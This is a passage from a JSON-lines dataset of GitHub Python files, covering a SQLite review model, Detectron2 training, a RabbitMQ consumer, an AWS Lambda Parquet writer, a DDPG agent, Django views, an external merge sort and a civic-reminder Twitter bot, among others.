pros\r\n self.cons = cons\r\n self.users_pk=users_pk\r\n \r\n\r\n\r\n\r\n def _insert(self):\r\n with sqlite3.connect(self.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\"INSERT INTO reviews(\r\n review,company,time_stamp,pros,cons,users_pk) \r\n VALUES (?,?,?,?,?,?);\"\"\"\r\n\r\n values = (self.review,self.company,self.time_stamp,self.pros,self.cons,self.users_pk)\r\n cursor.execute(SQL, values)\r\n\r\n\r\n def save(self):\r\n if self.pk:\r\n self._update()\r\n else:\r\n self._insert()\r\n\r\n\r\n\r\n @classmethod\r\n def count_reviews(cls,company):\r\n with sqlite3.connect(cls.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\" SELECT COUNT(review) FROM reviews WHERE company=?\"\"\"\r\n cursor.execute(SQL, (company,))\r\n row = cursor.fetchall()\r\n return row\r\n\r\n\r\n @classmethod\r\n def get_reviews(cls,company):\r\n with sqlite3.connect(cls.dbpath) as 
conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\" SELECT review,time_Stamp ,pros,cons FROM reviews WHERE company=?\"\"\"\r\n cursor.execute(SQL, (company,))\r\n row = cursor.fetchall()\r\n return row","repo_name":"kbrien11/stackedcash","sub_path":"app/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15356248658","text":"import logging\nfrom abc import abstractmethod\nfrom typing import List, Union, Optional, Tuple\n\nfrom qiskit.aqua.operators.converters.converter_base import ConverterBase\nfrom qiskit.aqua.operators.operator_base import OperatorBase\nfrom qiskit.circuit import ParameterExpression, ParameterVector\n\nlogger = logging.getLogger(__name__)\n\n\nclass CircuitGradient(ConverterBase):\n r\"\"\"Circuit to gradient operator converter.\n\n Converter for changing parameterized circuits into operators\n whose evaluation yields the gradient with respect to the circuit parameters.\n\n This is distinct from DerivativeBase converters which take gradients of composite\n operators and handle things like differentiating combo_fn's and enforcing product rules\n when operator coefficients are parameterized.\n\n CircuitGradient - uses quantum techniques to get derivatives of circuits\n DerivativeBase - uses classical techniques to differentiate operator flow data structures\n \"\"\"\n\n # pylint: disable=arguments-differ\n @abstractmethod\n def convert(self,\n operator: OperatorBase,\n params: Optional[Union[ParameterExpression, ParameterVector,\n List[ParameterExpression],\n Tuple[ParameterExpression, ParameterExpression],\n List[Tuple[ParameterExpression, ParameterExpression]]]]\n = None,\n ) -> OperatorBase:\n r\"\"\"\n Args:\n operator: The operator we are taking the gradient of\n params: The parameters we are taking the gradient wrt: ω\n If a ParameterExpression, ParameterVector or List[ParameterExpression] is given,\n then the 1st order derivative of the operator is calculated.\n If a Tuple[ParameterExpression, ParameterExpression] or\n List[Tuple[ParameterExpression, ParameterExpression]]\n is given, then the 2nd order derivative of the operator is calculated.\n\n Returns:\n An operator whose evaluation yields the Gradient.\n\n Raises:\n ValueError: If ``params`` contains a parameter not present in ``operator``.\n \"\"\"\n raise NotImplementedError\n","repo_name":"qiskit-community/qiskit-aqua","sub_path":"qiskit/aqua/operators/gradients/circuit_gradients/circuit_gradient.py","file_name":"circuit_gradient.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":564,"dataset":"github-code","pt":"66"} +{"seq_id":"29597493332","text":"'''\n2020/10/29\n모델 새로 학습 시킬 때 output folder 지우고 val_result 안에 있는 사진 파일 지우거나 백업\nvideorighter\n'''\n\nfrom detectron2.structures import BoxMode\nfrom detectron2.utils.logger import setup_logger\n\nsetup_logger()\nimport numpy as np\nimport os, json, cv2, random\nimport matplotlib.pyplot as plt\n\nfrom detectron2 import model_zoo\nfrom detectron2.engine import DefaultPredictor, DefaultTrainer\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer, ColorMode\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\nfrom PIL import ImageFile\nimport time\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n\ndef get_facelip_dtcs(json_dir):\n json_file = json_dir\n with open(json_file) as f:\n imgs_anns = json.load(f)\n dataset_dicts = []\n for z 
in range(len(imgs_anns['images'])):\n record = {}\n record['file_name'] = imgs_anns['images'][z]['file_name']\n record['image_id'] = imgs_anns['images'][z]['id']\n record['width'] = imgs_anns['images'][z]['width']\n record['height'] = imgs_anns['images'][z]['height']\n anno_list = []\n for i in range(len(imgs_anns['annotations'])):\n anno = {}\n if imgs_anns['images'][z]['id'] == imgs_anns['annotations'][i]['image_id']:\n anno['bbox'] = imgs_anns['annotations'][i]['bbox'].copy() # check\n anno['bbox_mode'] = BoxMode.XYWH_ABS\n anno['segmentation'] = []\n anno['category_id'] = imgs_anns['annotations'][i]['category_id']-1 # check\n anno_list.append(anno)\n record['annotations'] = anno_list\n dataset_dicts.append(record)\n return dataset_dicts\ndataset_dicts_train = get_facelip_dtcs(\"/home/videorighter/detectron/FACELIP_DATA_train/annotations/output_train.json\")\nprint(len(dataset_dicts_train))\n\nstart = time.time()\n############################### get resister, metadata #################################\nfor d in [\"train\", \"val\"]:\n DatasetCatalog.register(\"facelip_\" + d, lambda d=d: get_facelip_dtcs(\n \"/home/videorighter/detectron/FACELIP_DATA_\" + d + \"/annotations/output_\" + d + \".json\"))\n MetadataCatalog.get(\"facelip_\" + d).set(thing_classes=[\"lip\", \"face\", \"product\"])\ntrain_facelip_metadata = MetadataCatalog.get(\"facelip_train\")\nval_facelip_metadata = MetadataCatalog.get(\"facelip_val\")\n\n\n################################# training model #######################################\ncfg = get_cfg()\ncfg.merge_from_file(\n \"/home/videorighter/detectron/detectron2/configs/COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\")\ncfg.DATASETS.TRAIN = (\"facelip_train\",)\ncfg.DATASETS.TEST = () # no metrics implemented for this dataset\ncfg.DATALOADER.NUM_WORKERS = 2\ncfg.MODEL.MASK_ON = False\n# cfg.MODEL.BACKBONE.FREEZE_AT = 0\ncfg.MODEL.WEIGHTS = \"/home/videorighter/detectron/detectron2/configs/COCO-Detection/model_final_68b088.pkl\" # initialize from model zoo\ncfg.SOLVER.IMS_PER_BATCH = 1\ncfg.SOLVER.BASE_LR = 0.0001\ncfg.SOLVER.MAX_ITER = 4000 # 300 iterations seems good enough, but you can certainly train longer\ncfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128 # faster, and good enough for this toy dataset\ncfg.MODEL.ROI_HEADS.NUM_CLASSES = 3 # 2 classes (lip, face, product)\n\nos.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\ntrainer = DefaultTrainer(cfg)\n\n# 이전에 학습시킨 pth파일로 resume할 것인지 여부\ntrainer.resume_or_load(resume=True)\ntrainer.train()\n\n\n################################# model test ####################################\ncfg.DATASETS.TEST = (\"facelip_val\",) # no metrics implemented for this dataset\ncfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, \"model_final.pth\")\ncfg.MODEL.RETINANET.SCORE_THRESH_TEST = 0.2 # set the testing threshold for this model\npredictor = DefaultPredictor(cfg)\n\n\n############################# validation print ##################################\ndataset_dicts_val = get_facelip_dtcs(\"/home/videorighter/detectron/FACELIP_DATA_val/annotations/output_val.json\")\nfor d in dataset_dicts_val:\n im = cv2.imread(d[\"file_name\"])\n outputs = predictor(im)\n v = Visualizer(im[:, :, ::-1],\n metadata=val_facelip_metadata,\n scale=1)\n v = v.draw_instance_predictions(outputs[\"instances\"].to(\"cpu\"))\n img = v.get_image()[:, :, ::-1]\n cv2.imwrite(os.path.join(\"/home/videorighter/detectron/val_result\", os.path.split(d[\"file_name\"])[1]), img)\n\n############################# validation score 
###################################\nfrom detectron2.evaluation import COCOEvaluator, inference_on_dataset\nfrom detectron2.data import build_detection_test_loader\n\nevaluator = COCOEvaluator(\"facelip_val\", cfg, False, output_dir=\"./output_val/\")\nval_loader = build_detection_test_loader(cfg, \"facelip_val\")\nprint(inference_on_dataset(trainer.model, val_loader, evaluator))\nprint(\"running time: \", time.time() - start)","repo_name":"videorighter/object_detection","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"32501108849","text":"#12.lista\ndef productoEscalar(a,b):\n producto=0\n for i in range(len(a)):\n producto +=a[i]*b[i]\n return producto\n \n \n \n \nd=[3,2,8,7,8,1,9,10]\ne=[3,2,8,7,8,1,9,10]\nprint(productoEscalar(d,e))","repo_name":"anaicm/Principio_Programacion_Python","sub_path":"practica 8/12.listas.2.py","file_name":"12.listas.2.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71136930772","text":"import pika\nimport json\n\n# Connect to RabbitMQ\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\n\n# Function will be applied then message received\ndef callback(ch, method, properties, body):\n if properties.content_type == 'application/json':\n d = json.loads(body.decode())\n print(\" [x] Received %r\" % d)\n else:\n print(\" [x] Received %r\" % body.decode())\n\n\nchannel.queue_declare(queue='hello') # declare queue just in case it does not exists\n\nchannel.basic_consume(queue='hello', # name of queue\n auto_ack=True, # if python crashes => do not send message back to queue\n # delete message from queue immediately (without waiting for response from consumer)\n on_message_callback=callback) # function to be applied\n\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()\n","repo_name":"DmitriiDenisov/rabbitmq_lab","sub_path":"tutorial_1/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"39080353890","text":"\"\"\"\nExample taken from here:\nhttps://realpython.com/async-io-python/\n\na corouting makerandom() keeps producing random int\nin the range (0, 10). 
Until one of them exceeds a threshold,\nlet multiple calls of this corouting not need to wait\nfor each other to complete in succession.\n\"\"\"\n\nimport asyncio\nimport random\n\n# ANSI colors\nc = (\n \"\\033[0m\", # End of color\n \"\\033[36m\", # Cyan\n \"\\033[91m\", # Red\n \"\\033[35m\", # Magenta\n)\n\nasync def randint(a: int, b: int) -> int:\n return random.randint(a, b)\n\nasync def makerandom(idx: int, threshold: int = 6) -> int:\n print(c[idx + 1] + f\"Initiated makerandom({idx}).\")\n i = await randint(0, 10)\n while i <= threshold:\n print(c[idx + 1] + f\"makerandom({idx}) == {i} too low; retrying.\")\n await asyncio.sleep(idx + 1)\n i = await randint(0, 10)\n \n print(c[idx + 1] + f\"---> Finished: makerandom({idx}) == {i}\" + c[0])\n return i\n\nasync def main():\n # gather tasks\n res = await asyncio.gather(\n *(makerandom(i, 10 - i -1) for i in range(3))\n )\n return res\n\nif __name__ == \"__main__\":\n random.seed(444)\n r1, r2, r3 = asyncio.run(main())\n print()\n print(f\"r1: {r1}, r2: {r2}, r3: {r3}\")","repo_name":"adikabintang/learn-python","sub_path":"22_asyncio/2_rand.py","file_name":"2_rand.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"342481725","text":"# awswrangler used toaccess files stored in s3 directly\r\nimport awswrangler as wr\r\nimport pandas as pd\r\nimport urllib.parse\r\nimport os\r\n\r\n# Temporary hard-coded AWS Settings; i.e. to be set as OS variable in Lambda\r\n\r\n# Some values that shouldn't be stored in the code are stored on the pc in external file \r\n# and accessed using os.environ[] method\r\n# \r\nos_input_s3_cleansed_layer = os.environ['s3_cleansed_layer']\r\nos_input_glue_catalog_db_name = os.environ['glue_catalog_db_name']\r\nos_input_glue_catalog_table_name = os.environ['glue_catalog_table_name']\r\nos_input_write_data_operation = os.environ['write_data_operation'] # where we want to append data\r\n\r\n\r\ndef lambda_handler(event, context):\r\n # Get the object from the event and show its content type\r\n\r\n # Reading the file from the s3\r\n # It will use the environ variable to get our bucket name\r\n\r\n bucket = event['Records'][0]['s3']['bucket']['name']\r\n # Will use key provided inside the variable\r\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\r\n try:\r\n\r\n # Creating DF from content\r\n df_raw = wr.s3.read_json('s3://{}/{}'.format(bucket, key))\r\n\r\n # Extract required columns:\r\n df_step_1 = pd.json_normalize(df_raw['items'])\r\n\r\n # Write to S3\r\n wr_response = wr.s3.to_parquet(\r\n df=df_step_1,\r\n path=os_input_s3_cleansed_layer,\r\n dataset=True,\r\n database=os_input_glue_catalog_db_name,\r\n table=os_input_glue_catalog_table_name,\r\n mode=os_input_write_data_operation\r\n )\r\n\r\n return wr_response\r\n except Exception as e:\r\n print(e)\r\n print('Error getting object {} from bucket {}. 
Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))\r\n raise e","repo_name":"VaiibhavThatai/YouTube-Data-Pipeline-Using-AWS","sub_path":"lambda_function_yt.py","file_name":"lambda_function_yt.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72920985489","text":"from unityagents import UnityEnvironment\nimport numpy as np\n\nenv = UnityEnvironment(file_name='Reacher.exe')\n\n# get the default brain\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\n# reset the environment\nenv_info = env.reset(train_mode=True)[brain_name]\n\n# number of agents\nnum_agents = len(env_info.agents)\nprint('Number of agents:', num_agents)\n\n# size of each action\naction_size = brain.vector_action_space_size\nprint('Size of each action:', action_size)\n\n# examine the state space\nstates = env_info.vector_observations\nstate_size = states.shape[1]\nprint('There are {} agents. Each observes a state with length: {}'.format(num_agents, state_size))\nprint('The state for the first agent looks like:', states[0])\n\nenv_info = env.reset(train_mode=False)[brain_name] # reset the environment\n# states = env_info.vector_observations # get the current state (for each agent)\n# scores = np.zeros(num_agents) # initialize the score (for each agent)\n# while True:\n# actions = np.random.randn(num_agents, action_size) # select an action (for each agent)\n# actions = np.clip(actions, -1, 1) # all actions between -1 and 1\n# env_info = env.step(actions)[brain_name] # send all actions to tne environment\n# next_states = env_info.vector_observations # get next state (for each agent)\n# rewards = env_info.rewards # get reward (for each agent)\n# dones = env_info.local_done # see if episode finished\n# scores += env_info.rewards # update the score (for each agent)\n# states = next_states # roll over states to next time step\n# if np.any(dones): # exit loop if episode finished\n# break\n# print('Total score (averaged over agents) this episode: {}'.format(np.mean(scores)))\n\nimport gym\nimport random\nimport torch\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pyplot as plt\n#%matplotlib inline\n\nfrom ddpg_agent import Agent\n\n# create single DDPG Agent\nagent = Agent(state_size=state_size, action_size=action_size, random_seed=10)\n\ndef ddpg(n_episodes=200, max_t=1000):\n scores_deque = deque(maxlen=100)\n scores = []\n max_score = -np.Inf\n for i_episode in range(1, n_episodes+1):\n\n # reset the environment\n env_info = env.reset(train_mode=True)[brain_name]\n states = env_info.vector_observations # NOTE: size =\n\n agent.reset()\n score = 0\n for t in range(max_t):\n actions = agent.act(states)\n\n env_info = env.step(actions)[brain_name] # send all actions to tne environment\n next_states = env_info.vector_observations # get next state (for each agent)\n rewards = env_info.rewards # get reward (for each agent)\n dones = env_info.local_done # see if episode finished\n\n agent.step(states, actions, rewards, next_states, dones)\n states = next_states\n score += np.mean(rewards)\n if any(dones):\n break\n\n scores_deque.append(score)\n scores.append(score)\n print('\\rEpisode {}\\tAverage Score: {:.2f}\\tScore: {:.2f}'.format(i_episode, np.mean(scores_deque), score), end=\"\")\n if i_episode % 100 == 0:\n torch.save(agent.actor_local.state_dict(), 'checkpoint_actor.pth')\n torch.save(agent.critic_local.state_dict(), 
'checkpoint_critic.pth')\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_deque)))\n return scores\n\nscores = ddpg()\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nplt.plot(np.arange(1, len(scores)+1), scores)\nplt.ylabel('Score')\nplt.xlabel('Episode #')\nplt.show()","repo_name":"puggybumper/drlnd_p2_reacher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9490297540","text":"k = \"keyence\"\nS = input()\nnum = len(k)\nrem = len(S) - num\n\nflag = False\nif S == k:\n flag = True\n\nfor i in range(len(S)-rem):\n if S[0:i] + S[i+rem:] == k:\n flag = True\nif flag:\n print(\"YES\")\nelse:\n print(\"NO\")\n","repo_name":"lilium513/competition_programing","sub_path":"keyence/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73828661969","text":"from django.shortcuts import render, get_object_or_404, redirect, reverse\nfrom .models import Feature, FeatureComment\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import FeatureForm, FeatureCommentForm\n\n# Create your views here.\n@login_required()\ndef all_features(request):\n all_features = Feature.objects.all()\n return render(request, \"features.html\", {'all_features':all_features} )\n\n@login_required()\ndef upvote_feature(request, id):\n \"\"\"\n A view that upvotes the selected bug\n \"\"\"\n feature = Feature.objects.get(pk=id)\n feature.upvotes += 1\n feature.save()\n return redirect(all_features)\n\n@login_required()\ndef add_feature(request):\n if request.method == \"POST\":\n submitted_form = FeatureForm(request.POST, request.FILES)\n if submitted_form.is_valid():\n submitted_form.save()\n return redirect(all_features)\n else:\n return(request,\"add_feature.html\",{\n 'form':submitted_form\n })\n else:\n toadd_form = FeatureForm()\n return render(request,\"add_feature.html\",{\n 'form' : toadd_form\n })\n\n@login_required()\ndef edit_feature(request, id):\n edit_item = get_object_or_404(Feature, pk=id)\n if request.method == \"POST\":\n submitted_form = FeatureForm(request.POST, instance=edit_item)\n if submitted_form.is_valid():\n submitted_form.save()\n return redirect(all_features)\n else:\n form = FeatureForm(instance=edit_item)\n return render(request, 'edit_feature.html',{\n 'item_form':form\n })\n\n@login_required()\ndef delete_feature(request, id):\n delete_item = get_object_or_404(Feature, pk=id)\n if request.method == \"POST\":\n delete_item.delete()\n return redirect(all_features)\n else:\n return render(request, 'confirm-delete.html',{\n 't':delete_item\n })\n\n","repo_name":"Code-Institute-Submissions/fullstack-project","sub_path":"features/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35677369393","text":"import pytz\nfrom datetime import datetime\nimport time\nimport random\n\ndef variable_ratio_daily_countdown_tweet(api,delay_after_tweeting=0,tweet_inverse_odds=15):\n \"\"\"tweets out a daily countdown to the wellington spatial plan submission\n does so probabilistically, i.e., when run n times a day, each time it is run there is a 1/n chance it will tweet\n so as to spread the tweets right across the period.\n \"\"\"\n\n #get new zealand timezone\n nztz = 
pytz.timezone(\"Pacific/Auckland\")\n #get now and today\n now = datetime.now(nztz)\n today = datetime.date(now)\n\n spatial_plan_deadline = datetime.strptime(\"2020-10-05 17:00\",\"%Y-%m-%d %H:%M\")\n days_left_to_submit = (spatial_plan_deadline.date() - today).days\n\n\n # for tweets going out between 8 AM and up to 11 PM\n permitted_start_time = datetime.combine(today,datetime.strptime(\"07:59\", \"%H:%M\").time()).astimezone(nztz)\n permitted_end_time = datetime.combine(today, datetime.strptime(\"22:50\", \"%H:%M\").time()).astimezone(nztz)\n\n #determine if now is within the permitted range\n is_within_time_range = (now>permitted_start_time) & (now < permitted_end_time)\n\n #this is about 15 hours of the day so that's what we'll use\n chance_of_tweeting = 1/tweet_inverse_odds\n random.seed(datetime.now())\n lucky_hour_dip = random.random()\n print(\"lucky hour dip number is \" + str(lucky_hour_dip))\n is_lucky_hour = (lucky_hour_dip 0:\n print(\"tweeting a reminder about wellington spatial plan\")\n tweet_version = random.sample([0,1,2,3],1)[0]\n if tweet_version==0:\n tweet_text = (str(days_left_to_submit) +\n \" days left to submit for the Wellington Spatial Plan. \" +\n \"All it takes is 10 minutes for you to influence the future of Wellington.\" +\n \" Submit here: https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==1:\n tweet_text = (\n \"There are \" + str(days_left_to_submit) + \" days to get in a submission for the Wellington Spatial Plan. \" +\n \"It sets the limits for how much housing can be built in Wellington for the next THIRTY YEARS! \" +\n \"Here's the link to submit. https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==2:\n tweet_text = (\n str(days_left_to_submit) + \" sleeps left until the submission deadline for the Wellington Spatial Plan closes. \" +\n \"It takes 10 minutes of your time - if you haven't already, get your submission in now. \" +\n \"https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==3:\n tweet_text = (\n str(days_left_to_submit) + \" days left to have a say on the Wellington Spatial Plan. \" +\n \"It takes 10 minutes and determines whether Wellington housing is affordable for the next 30 years.\" +\n \" tell the council we need more housing! 
\" +\n \"https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n\n print(tweet_text)\n\n\n api.update_status(tweet_text)\n\n time.sleep(delay_after_tweeting)\n\n# from authenticate import *\n#\n# api = get_authenticated_api()\n#\n# for i in range(0,10):\n# variable_ratio_daily_countdown_tweet(api,1)\n\n\n\n","repo_name":"bjsmith/housingbot","sub_path":"daily_countdown.py","file_name":"daily_countdown.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30231440176","text":"#!/usr/bin/env python3\n\nimport sys\nimport math\nimport csv\n\ncolmapping={}\ncolindexing={}\nmainmemorysize=0\nchunksize=0\nheap=[]\n\nclass Node:\n\tdef __init__(self):\n\t\t#data will be a list\n\t\tself.data=[]\n\t\tself.fp=-1\n\ndef readfile(filename):\n lines=[]\n f1=open(filename)\n lines=f1.readlines()\n f1.close()\n return lines\n\ndef readmetadata(filename):\n\tlines=readfile(filename)\n\tj=0\n\tfor i in lines:\n\t\ta,b=i.split(\",\")\n\t\tcolmapping[a]=int(b)\n\t\tcolindexing[a]=j\n\t\tj+=1\n\t\t\ndef readwordfromlines(line):\n\twords=[]\n\toffset=0\n\tfor i in colmapping.values():\n\t\twords.append(line[offset:offset+i])\n\t\toffset=offset+i+2\n\treturn words\n\ndef parseinput(cmddata):\n\tinput_file=cmddata[1]\n\toutput_file=cmddata[2]\n\tsize=int(cmddata[3])*1024*1024\n\tnthread=int(cmddata[4])\n\tcode=cmddata[5]\n\tif(code=='dsc'):\n\t\tflag=True\n\telif(code=='asc'):\n\t\tflag=False\n\telse:\n\t\tprint('PLease specify the correct sorting order')\n\t\texit()\n\tcolumns=[]\n\ti=6\n\twhile(i0):\n\t\tfilearray.append('temp'+str(findex)+'.txt')\n\t\tf2=open(filearray[findex],'w')\n\t\ttempresult=sortdata(tempresult,columns,flag)\n\t\twritelistoflist(f2,tempresult)\n\t\tf2.close()\n\t\tfindex+=1\n\tf1.close()\n\treturn filearray\n\ndef compare(l1,l2,columns,flag):\n\tif(flag):\n\t\tfor j in columns:\n\t\t\ti=colindexing[j]\n\t\t\tif(l1[i]>l2[i]):\n\t\t\t\treturn True\n\t\t\telif(l1[i]==l2[i]):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\treturn False\n\t\treturn False\n\telse:\n\t\tfor j in columns:\n\t\t\ti=colindexing[j]\n\t\t\tif(l1[i]=0):\n\t\tminheapify(i,columns,flag)\n\t\ti-=1\n\ndef adjust(pos,columns,flag):\n\tchild=pos\n\tparent=math.floor((child-1)/2)\n\n\twhile(parent>=0 and compare(heap[child].data,heap[parent].data,columns,flag)):\n\t\ttemp=heap[child]\n\t\theap[child]=heap[parent]\n\t\theap[parent]=temp\n\n\t\tchild=parent\n\t\tparent=math.floor((child-1)/2)\n\ndef removemin(columns,flag):\n\ttemp=heap[0]\n\t\n\theap[0]=heap[len(heap)-1]\n\theap.pop()\n\n\tminheapify(0,columns,flag)\n\treturn temp\n\ndef mergesplittedfiles(filearray,columns,flag):\n\n\tfilepointer=[None]*len(filearray)\n\tfor i in range(len(filearray)):\n\t\tfilepointer[i]=open(filearray[i])\n\t\tdata=readoneline(filepointer[i])\n\t\ttemp=Node()\n\t\ttemp.fp=i\n\t\ttemp.data=data\n\t\theap.append(temp)\n\n\tbuildminheap(columns,flag)\n\n\tfpwrite=open('tempoutput.txt','w')\n\tfileclosecount=0\n\n\twhile(fileclosecount!=len(filearray)):\n\t\ttemp=removemin(columns,flag)\n\t\tresult=[]\n\t\tresult.append(temp.data)\n\t\twritelistoflist(fpwrite,result)\n\n\t\tdata=readoneline(filepointer[temp.fp])\n\t\tif(len(data)!=0):\n\t\t\ttemp.data=data\n\t\t\theap.append(temp)\n\t\t\tadjust(len(heap)-1,columns,flag)\n\t\telse:\n\t\t\tfileclosecount+=1\n\n\tfor i in range(len(filearray)):\n\t\tfilepointer[i]=open(filearray[i])\n\treturn 1\n\ncmddata=sys.argv\nif(len(cmddata)<6):\n\tprint('PLease enter all 
parameter')\nelse:\n\tinput_file,output_file,mainmemorysize,nthread,flag,columns=parseinput(cmddata)\n\treadmetadata('metadata.txt')\n\tchunksize=calcchunksize()\n\n\tprintstats()\n\t\n\tfilearray=splitdata_sorted(input_file,columns,flag)\n\tmergesplittedfiles(filearray,columns,flag)\n","repo_name":"shanu-sh/TwoPhaseMergeSort","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30134471056","text":"import unittest\n\nfrom clib.utils import load_class, get_index_from_label\n\n\nclass LoadClassTest(unittest.TestCase):\n def setUp(self):\n self.vocfilepath = 'tests/data/voc.names'\n self.tags = {0: 'hoge', 1: 'fuga'}\n\n def test_load_class(self):\n self.assertEqual(load_class(self.vocfilepath),\n {0: 'aeroplane', 1: 'bicycle', 2: 'bird',\n 3: 'boat', 4: 'bottle', 5: 'bus', 6: 'car',\n 7: 'cat', 8: 'chair', 9: 'cow',\n 10: 'diningtable', 11: 'dog', 12: 'horse',\n 13: 'motorbike', 14: 'person',\n 15: 'pottedplant', 16: 'sheep', 17: 'sofa',\n 18: 'train', 19: 'tvmonitor'})\n\n def test_get_index(self):\n self.assertEqual(get_index_from_label(self.tags, 'fuga'), 1),\n","repo_name":"Swall0w/clib","sub_path":"tests/utils/test_load.py","file_name":"test_load.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6766661709","text":"import functools\n\ndef memoize(func):\n cache = func.cache = {}\n @functools.wraps(func)\n def memoized_func(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = func(*args, **kwargs)\n return cache[key]\n return memoized_func\n\n@memoize\ndef sudan(n, x, y):\n if n == 0:\n return x + y\n if y == 0:\n return x\n else:\n return sudan(n - 1, sudan(n, x, y - 1), sudan(n, x, y - 1) + y)\n \nprint (sudan(2, 3, 1))\nprint (sudan(2, 4, 1))\nprint (sudan(2, 1, 2))\nprint (sudan(2, 2, 2))","repo_name":"karol95c/University","sub_path":"Python/Lab3/memoize.py","file_name":"memoize.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3355453882","text":"import json\nimport requests\nimport os\nimport time\n\n#url='http://marketplace.envato.com/api/edge/item:10431404.json'\ntheme = open('theme_id.txt','r')\ntheme_id = theme.readlines()\ntotal_theme = theme_id.__len__()\n\nsave_to_file = open('theme_data_Apr05.txt','r+', buffering = -1)\n\ni=0\nwhile i < total_theme:\n url1 = 'http://marketplace.envato.com/api/edge/item:' + theme_id[i] + '.json'\n i += 1\n# data = requests.get(url1).text\n# data = json.loads(data)\n data = requests.get(url1).json()\n try:\n url = data ['item']['url']\n except TypeError:\n url = 'empty'\n pass\n print (url1)\n# print (url)\n themeforest = url.find('http://themeforest.net/')\n if themeforest != -1:\n item_id = data ['item']['id']\n item_name = data ['item']['item']\n user = data ['item']['user']\n sales = data ['item']['sales']\n# rating = data ['item']['rating']\n rating_decimal = data ['item']['rating_decimal']\n cost = data ['item']['cost']\n uploaded_on = data ['item']['uploaded_on']\n last_update = data ['item']['last_update']\n category = data['item']['category']\n tags = data ['item']['tags']\n string = item_id+';'+item_name+';'+user+';'+url+';'+sales+';'+cost+';'+rating_decimal+';'+uploaded_on+';'+last_update+';'+category+';'+tags+'\\n'\n string_encode = 
string.encode('ascii','replace')\n# print(string_encode)\n string_decode = string_encode.decode('ascii','replace')\n save_to_file.write(string_decode)\n save_to_file.flush()\n os.fsync(save_to_file.fileno())\n #time.sleep(4)\n else:\n continue\n \nprint (item_no)\n\nsave_to_file.close()\n\n","repo_name":"manojps/envato-marketplace-stats-using-api","sub_path":"envato_item_api.py","file_name":"envato_item_api.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"26522166901","text":"#filename: getip.py\n\nimport os\nimport sys\n\ndef get_ips():\n\n tmp=list()\n \n ipcsv_path=os.path.join(sys.path[0],'ip_10896_5w.csv')\n f=open(ipcsv_path,'r')\n for line in f.readlines():\n line=line.strip().split('.')\n line[0]=\".\".join(line[0:2])\n line[1]=256*int(line[2])+int(line[3])\n tmp.append(line[:2])\n tmp.sort()\n f.close\n \n return tmp\n\n#list=get_ips()\n#print 